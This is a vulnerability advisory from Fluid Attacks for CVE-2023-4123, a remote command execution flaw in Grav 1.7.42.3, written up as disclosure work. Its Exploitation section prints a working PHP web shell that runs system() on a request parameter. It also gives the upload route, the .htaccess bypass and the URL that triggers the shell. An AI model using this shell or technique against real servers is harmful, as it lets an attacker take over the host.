---
slug: advisories/benymore/
title: grav 1.7.42.3 - Remote Command Execution
authors: Ronald Hernandez
writer: rhernandez
codename: benymore
product: grav 1.7.42.3 - Remote Command Execution
date: 2023-08-11 12:00 COT
cveid: CVE-2023-4123
severity: 8.0
description: grav 1.7.42.3      -      Remote Command Execution
keywords: Fluid Attacks, Security, Vulnerabilities, RCE, Grav, Insecure File Upload, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="grav 1.7.42.3 - Remote Command Execution"
    code="[benymore](https://es.wikipedia.org/wiki/Benny_Mor%C3%A9)"
    product="grav 1.7.42.3"
    affected-versions="Version 1.7.42.3"
    fixed-versions=""
    state="Private"
    release="2023-08-11">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Remote Command Execution"
    rule="[004. Remote command execution](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-004/)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H/E:H/RL:U/RC:C"
    score="8.0"
    available="Yes"
    id="[CVE-2023-4123](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-)">
</vulnerability-table>

## Description

grav allows an user to execute commands on the server by abusing
the manual install themes functionality

## Vulnerability

A Remote Command Execution (RCE) vulnerability has been identified
in grav, a admin user or a user with Super User privilegies can
upload manual themes, this functionality does not check the
integrity of the packages or perform any other type of validation
on the uploaded themes, with this flaw we can add a php shell we also
need to add a default .htaccess file to bypass the default
configuration that prevents the execution of php files in the themes
folder in the folder.

![poc](https://user-images.githubusercontent.com/87587286/256417650-02c28cd7-2f73-4d86-b0b4-f5409b4969d2.gif)

## Exploitation

In the Portal of grav , we need to go to Tools -> Direct
Install and Upload our theme with the payload:

```php
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
```

![poc1](https://user-images.githubusercontent.com/87587286/256418427-c908923f-a913-45ee-87ce-83794c01f52c.png)

after that, we need to visit the theme path with our shell

```text
server/user/themes/material-lite/images/poc.php?cmd=whoami
```

![poc2](https://user-images.githubusercontent.com/87587286/256418444-0a3fd769-eba2-4080-be13-84f77bcc22ed.png)

## Our security policy

We have reserved the ID CVE-2023-4123 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: grav 1.7.42.3

* Operating System: Linux

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by
[Ronald Hernandez](https://www.linkedin.com/in/ronald9105)
from Fluid Attacks' Offensive Team.

## References

**Vendor page** <https://github.com/getgrav/grav>

## Timeline

<time-lapse
  discovered="2023-07-26"
  contacted="2023-07-26"
  replied=""
  confirmed=""
  patched=""
  disclosure="2023-08-11">
</time-lapse>
